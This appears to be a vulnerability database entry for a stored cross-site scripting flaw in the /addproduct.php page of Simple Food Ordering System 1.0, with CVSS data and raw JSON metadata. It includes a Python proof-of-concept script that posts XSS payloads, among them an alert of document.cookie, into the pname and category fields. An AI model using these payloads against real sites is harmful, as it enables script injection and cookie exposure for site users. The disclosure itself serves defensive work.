Security Vulnerability Report
CVE-2025-12299 CVSS 4.3 MEDIUM

CVE-2025-12299

Published: 2025-10-27 17:15:38
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in code-projects Simple Food Ordering System 1.0. This vulnerability affects an unknown part of the file /addproduct.php. Manipulation of the argument pname/category/price results in cross-site scripting. The attack can be launched remotely. The exploit has been released to the public and may be used.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fabian:simple_food_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Simple Food Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-12299 PoC - Simple Food Ordering System 1.0 XSS Vulnerability
Target: /addproduct.php
Parameters: pname, category, price

Submits product-creation form data to /addproduct.php and reports whether
the application accepted the request.  It does not check whether the
submitted value is later rendered unescaped; that step is left to a manual
check of the product listing page (see verify_vulnerability).
"""
import requests
import sys


def exploit_xss(target_url, payload):
    """
    Post XSS test strings to the product-creation endpoint.

    Args:
        target_url: Base URL of the application (no trailing slash).
        payload: Test string tried first, ahead of the built-in ones.

    Returns:
        bool: True as soon as one POST is answered with HTTP 200,
        False if every attempt fails or raises.  Note that 200 only means
        the form submission was accepted, not that the stored value is
        reflected without output encoding.
    """
    endpoint = f"{target_url}/addproduct.php"

    # Caller-supplied string first, then the usual canary strings.
    candidates = (
        payload,
        "<script>alert(String.fromCharCode(88,83,83))</script>",
        "<img src=x onerror=alert(document.cookie)>",
        "<svg/onload=alert(document.domain)>",
        "javascript:alert(String.fromCharCode(88,83,83))",
    )

    for candidate in candidates:
        # pname and category carry the test string; price is kept numeric
        # so the form passes any numeric check on that field.
        form = {
            "pname": candidate,
            "category": candidate,
            "price": "99.99",
        }

        try:
            resp = requests.post(endpoint, data=form, timeout=10)
        except requests.exceptions.RequestException as err:
            # Transport-level failure: report it and move to the next string.
            print(f"[-] Error sending request: {err}")
            continue

        if resp.status_code != 200:
            print(f"[-] Request failed with status: {resp.status_code}")
            continue

        # First accepted submission ends the loop; remaining strings are not sent.
        print(f"[+] Payload sent successfully: {candidate}")
        print(f"[+] Response status: {resp.status_code}")
        return True

    return False


def verify_vulnerability(target_url):
    """
    Print the manual steps needed to confirm the stored value is rendered.

    Args:
        target_url: Base URL of the application (no trailing slash).

    Returns:
        None.  The script cannot observe script execution itself, so the
        confirmation is left to the operator.
    """
    steps = (
        "[*] Manual verification required:",
        f"[*] 1. Visit {target_url}/addproduct.php",
        "[*] 2. Submit a product with XSS payload in pname/category/price",
        "[*] 3. Visit the product listing page to trigger the XSS",
    )
    for line in steps:
        print(line)


if __name__ == "__main__":
    args = sys.argv[1:]

    # First positional argument is the base URL; second is optional.
    if not args:
        print("Usage: python3 cve-2025-12299.py <target_url> [payload]")
        print("Example: python3 cve-2025-12299.py http://localhost/Simple-Food-Ordering-System")
        sys.exit(1)

    target = args[0]
    payload = args[1] if len(args) > 1 else "<script>alert('XSS')</script>"

    print(f"[*] Exploiting CVE-2025-12299 on {target}")
    print(f"[*] Using payload: {payload}")

    exploit_xss(target, payload)
    verify_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12299", "sourceIdentifier": "[email protected]", "published": "2025-10-27T17:15:37.673", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Simple Food Ordering System 1.0. This vulnerability affects unknown code of the file /addproduct.php. The manipulation of the argument pname/category/price results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", 
"negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:simple_food_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A79BB63C-FF08-4190-BC96-A24DC587AD07"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/underatted/CVE/issues/18", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329971", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329971", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.676011", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}